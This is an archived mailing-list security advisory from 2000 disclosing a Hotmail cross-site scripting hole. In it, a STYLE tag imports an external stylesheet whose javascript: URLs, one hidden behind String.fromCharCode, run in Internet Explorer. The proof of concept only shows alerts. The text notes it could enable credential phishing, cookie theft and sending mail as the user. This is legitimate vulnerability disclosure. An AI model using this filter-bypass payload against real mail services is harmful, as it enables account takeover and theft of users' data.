|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Hotmail security hole - injecting JavaScript in IE using "
import url(http://host/hostile.css)"From: Georgi Guninski (joro
NAT.BG)Date: Mon Apr 24 2000 - 08:10:36 CDT
- Next message: rain forest puppy: "Re: RFP2K03: Contemplations on dvwssr.dll and its affects on life"
- Previous message: Steve: "Server Extensions Security Vulnerability 4-20-00 - Microsoft Bulletin"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Georgi Guninski security advisory #11, 2000
Hotmail security hole - injecting JavaScript in IE using "import
url(http://host/hostile.css)"
Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
Hotmail allows executing JavaScript code in email messages using
"import url(http://host/hostile.css)",
which may compromise user's Hotmail mailbox when viewed with Internet
Explorer.
Details:
Several months ago in my Advisory #3, 2000 I alerted about a Hotmail bug
with "import url(javascript:...)".
It was fixed, but now I found a similar bug.
There is a new security flaw in Hotmail which allows injecting and
executing
JavaScript code in an email message using the the <STYLE> tag, import
and the "javascript:" protocol.
This exploit works on Internet Explorer.
Hotmail tries to filter JavaScript code for security reasons.
Executing JavaScript when the user opens Hotmail email message allows
for example
displaying a fake login screen where the user enters his password which
is then stolen.
I don't want to make a scary demonstration, but it is also possible to
read user's
messages, to send messages from user's name and doing other mischief.
It is also possible to get the cookie from Hotmail, which is dangerous.
Hotmail deliberately escapes all JavaScript (it can escape) to prevent
such attacks, but obviously there are holes.
The following JavaScript is executed if embedded in a HTML message:
-------------------------------------------
<STYLE type=text/css>
import url(http://www.nat.bg/~joro/test.css);
</STYLE>
-------------------------------------------
where http://www.nat.bg/~joro/test.css contains:
-------------------------------------------
import url(javascript:alert('JavaScript is executed'));
import
url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));
-------------------------------------------
Workaround: Disable Active Scripting before viewing a Hotmail message or
don't use IE
NOTE: Do not ask me to crack Hotmail accounts, I do not do that.
Copyright 2000 Georgi Guninski
Regards,
Georgi Guninski
http://www.nat.bg/~joro
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
- Next message: rain forest puppy: "Re: RFP2K03: Contemplations on dvwssr.dll and its affects on life"
- Previous message: Steve: "Server Extensions Security Vulnerability 4-20-00 - Microsoft Bulletin"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]